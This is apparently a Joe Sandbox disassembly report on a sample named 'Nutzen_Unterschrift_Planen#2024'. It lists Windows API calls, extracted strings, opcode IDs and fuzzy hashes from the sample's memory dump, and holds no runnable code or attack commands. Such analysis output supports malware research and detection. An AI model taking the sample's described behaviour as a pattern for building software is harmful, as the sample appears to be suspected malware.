                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memchrmemset
                                                            • String ID: PD$PD
                                                            • API String ID: 1581201632-2312785699
                                                            • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                            • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                            APIs
                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                            • GetParent.USER32(?), ref: 00409FA5
                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                            • String ID:
                                                            • API String ID: 2163313125-0
                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$wcslen
                                                            • String ID:
                                                            • API String ID: 3592753638-3916222277
                                                            • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                            • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                            APIs
                                                            • memset.MSVCRT ref: 0040A47B
                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                            • String ID: %s (%s)$YV@
                                                            • API String ID: 3979103747-598926743
                                                            • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                            • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                            • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                            • API String ID: 2780580303-317687271
                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                            • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                            • String ID: Unknown Error$netmsg.dll
                                                            • API String ID: 2767993716-572158859
                                                            • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                            • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                            APIs
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                            • API String ID: 3176057301-2039793938
                                                            • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                            • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                            APIs
                                                            Strings
                                                            • database %s is already in use, xrefs: 0042F6C5
                                                            • unable to open database: %s, xrefs: 0042F84E
                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                            • database is already attached, xrefs: 0042F721
                                                            • out of memory, xrefs: 0042F865
                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                            • API String ID: 1297977491-2001300268
                                                            • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                            • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                            APIs
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                            • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                            • String ID: ($d
                                                            • API String ID: 1140211610-1915259565
                                                            • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                            • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                            APIs
                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                            • String ID:
                                                            • API String ID: 3015003838-0
                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                            APIs
                                                            • memset.MSVCRT ref: 00407E44
                                                            • memset.MSVCRT ref: 00407E5B
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                            • wcscpy.MSVCRT ref: 00407F10
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                            • String ID:
                                                            • API String ID: 59245283-0
                                                            • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                            • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                            • free.MSVCRT ref: 004185AC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                                            • String ID:
                                                            • API String ID: 2802642348-0
                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                            APIs
                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                            • API String ID: 3510742995-3273207271
                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                            • memset.MSVCRT ref: 00413ADC
                                                            • memset.MSVCRT ref: 00413AEC
                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                            • memset.MSVCRT ref: 00413BD7
                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                            • String ID: 3A
                                                            • API String ID: 3300951397-293699754
                                                            • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                            • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                            • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                            • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                            • String ID: strings
                                                            • API String ID: 3166385802-3030018805
                                                            • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                            • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                            APIs
                                                            • memset.MSVCRT ref: 00411AF6
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                            • wcscat.MSVCRT ref: 00411B2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                            • String ID: AE$.cfg$General$EA
                                                            • API String ID: 776488737-1622828088
                                                            • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                            • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                            APIs
                                                            • memset.MSVCRT ref: 0040D8BD
                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                            • memset.MSVCRT ref: 0040D906
                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                            • String ID: sysdatetimepick32
                                                            • API String ID: 1028950076-4169760276
                                                            • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
